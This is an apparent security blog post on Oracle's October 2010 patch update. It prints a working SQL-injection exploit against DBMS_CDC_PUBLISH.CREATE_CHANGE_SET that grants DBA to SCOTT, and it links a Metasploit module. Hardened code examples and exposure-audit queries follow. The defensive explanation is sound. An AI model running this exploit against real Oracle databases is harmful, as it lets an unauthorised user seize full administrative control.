Oracle CPU: October 2010

There are some very interesting issues fixed by Oracle in this month's Critical Patch Update (CPU), although the details of the exact vulnerabilities are still not public. The ones which I found really interesting are:

1. ZDI-10-201: Oracle Database Java Stored Procedure Race Condition Remote Code Execution Vulnerability

"This vulnerability allows remote attackers to break out of the Java Sandbox implemented by Oracle's relational database. Authentication is required in that a user must be able to create a Java stored procedure to trigger the issue." CVSS score 9.

2. SQL Injection in DBMS_CDC_PUBLISH.CREATE_CHANGE_SET, reported by Esteban, which could allow any user with EXECUTE_CATALOG_ROLE to become DBA.

The exploit is fairly simple:
--------------------
As SCOTT user:

-- Invoker-rights function: when called from inside the SYS-owned package, the
-- GRANT runs with the caller's (SYS) privileges; the autonomous transaction
-- lets it COMMIT independently of the calling statement.
create or replace function pwn return varchar2 authid current_user is
PRAGMA autonomous_transaction;
BEGIN
execute immediate 'grant dba to scott';
commit;
return 'z';
END;
/
--
grant execute on SCOTT.pwn to public;
--

-- The third argument is spliced into dynamic SQL unescaped, so the quotes
-- close the literal and the concatenated function call is executed.
begin
sys.dbms_cdc_publish.create_change_set('a','a','a''||SCOTT.pwn()||''a','Y',sysdate,
sysdate);
end;
/
------------------
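The bug pattern behind this is a caller-supplied string being concatenated into dynamic SQL. The following is an added example, not Oracle's code or the code of DBMS_CDC_PUBLISH: a hypothetical definer-rights procedure (with an invented CHANGE_SETS table) written first in the injection-prone style and then in two hardened forms, one using a bind variable and one using DBMS_ASSERT where an identifier genuinely has to be spliced into DDL.

```sql
-- Constructed table for the example (not part of the original post).
CREATE TABLE change_sets (set_name VARCHAR2(30));

-- Injection-prone pattern: the argument becomes part of the SQL text, so a
-- value like  a'||some_func()||'a  closes the literal and runs some_func()
-- with the procedure owner's privileges.
CREATE OR REPLACE PROCEDURE register_change_set_unsafe (p_set_name IN VARCHAR2)
AUTHID DEFINER IS
  v_sql VARCHAR2(4000);
BEGIN
  v_sql := 'INSERT INTO change_sets (set_name) VALUES (''' || p_set_name || ''')';
  EXECUTE IMMEDIATE v_sql;
END;
/

-- Hardened form 1: a bind variable. The value is passed as data and is never
-- parsed as SQL, so  a'||some_func()||'a  is simply stored as that string.
CREATE OR REPLACE PROCEDURE register_change_set_safe (p_set_name IN VARCHAR2)
AUTHID DEFINER IS
BEGIN
  EXECUTE IMMEDIATE 'INSERT INTO change_sets (set_name) VALUES (:1)'
    USING p_set_name;
END;
/

-- Hardened form 2: binds are not possible for identifiers in DDL, so validate
-- the name with DBMS_ASSERT before splicing it. SIMPLE_SQL_NAME raises
-- ORA-44003 (invalid SQL name) for anything that is not a plain identifier;
-- ENQUOTE_LITERAL is the equivalent guard when a literal must be spliced.
CREATE OR REPLACE PROCEDURE create_change_set_table (p_set_name IN VARCHAR2)
AUTHID DEFINER IS
  v_name VARCHAR2(128);
BEGIN
  v_name := DBMS_ASSERT.SIMPLE_SQL_NAME(p_set_name);
  EXECUTE IMMEDIATE 'CREATE TABLE cs_' || v_name || ' (id NUMBER)';
END;
/

-- Usage: the safe insert stores the hostile-looking string verbatim; the DDL
-- wrapper rejects it before any SQL is built.
BEGIN
  register_change_set_safe('a''||SCOTT.pwn()||''a');
END;
/
SELECT set_name FROM change_sets;

BEGIN
  create_change_set_table('a''||SCOTT.pwn()||''a');   -- raises ORA-44003
EXCEPTION
  WHEN OTHERS THEN
    DBMS_OUTPUT.PUT_LINE('rejected: ' || SQLERRM);
END;
/
```

The general rule the example illustrates: in definer-rights code (the default, and what SYS packages are), every piece of dynamic SQL built from caller input is a privilege boundary, and the fix is binds for values and DBMS_ASSERT for identifiers, never string escaping by hand.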
The exploit is already available in metasploit: https://www.metasploit.com/redmine/projects/framework/repository/revisions/10691/entry/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb. Thanks to MC

This affects 10gR1, 10gR2, 11gR1 and 11gR2. I agree with AppSec Inc that the CVSS score should be 7.5 and not 4.9, which Oracle has assigned to it.
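To judge exposure on a given instance while the CPU is being scheduled, a DBA wants to know who can actually reach the vulnerable package and who holds the role the post names. The queries below are an added example, not from the original post or from Oracle's advisory; they use only standard data-dictionary views (DBA_ROLE_PRIVS, DBA_TAB_PRIVS, DBA_PROCEDURES), and the role and package names come from the post.

```sql
-- 1. Everyone who ends up with EXECUTE_CATALOG_ROLE, directly or through
--    nested roles (DBA has it, so SYS/SYSTEM will appear; look for anyone else).
SELECT DISTINCT grantee
FROM   dba_role_privs
START WITH granted_role = 'EXECUTE_CATALOG_ROLE'
CONNECT BY PRIOR grantee = granted_role
ORDER  BY grantee;

-- 2. Direct EXECUTE grants on the package itself, i.e. every grantee that can
--    call DBMS_CDC_PUBLISH.CREATE_CHANGE_SET without going through the role.
SELECT grantee, privilege, grantable
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name = 'DBMS_CDC_PUBLISH'
ORDER  BY grantee;

-- 3. The other half of the exploit: invoker-rights (AUTHID CURRENT_USER)
--    functions and procedures that PUBLIC may execute. Such objects run with
--    the privileges of whoever calls them, which is what makes a call from
--    inside a SYS package dangerous.
SELECT p.owner, p.object_name, p.object_type
FROM   dba_procedures p
JOIN   dba_tab_privs  t
       ON t.owner = p.owner
      AND t.table_name = p.object_name
WHERE  p.authid = 'CURRENT_USER'
AND    p.object_type IN ('FUNCTION', 'PROCEDURE')
AND    t.grantee = 'PUBLIC'
AND    t.privilege = 'EXECUTE'
ORDER  BY p.owner, p.object_name;
```

The first two result sets together are the population that can exercise this bug; the third is worth reviewing on its own, since a definer-rights package calling an invoker-rights routine from an untrusted schema is the same class of problem regardless of which SYS package supplies the injection.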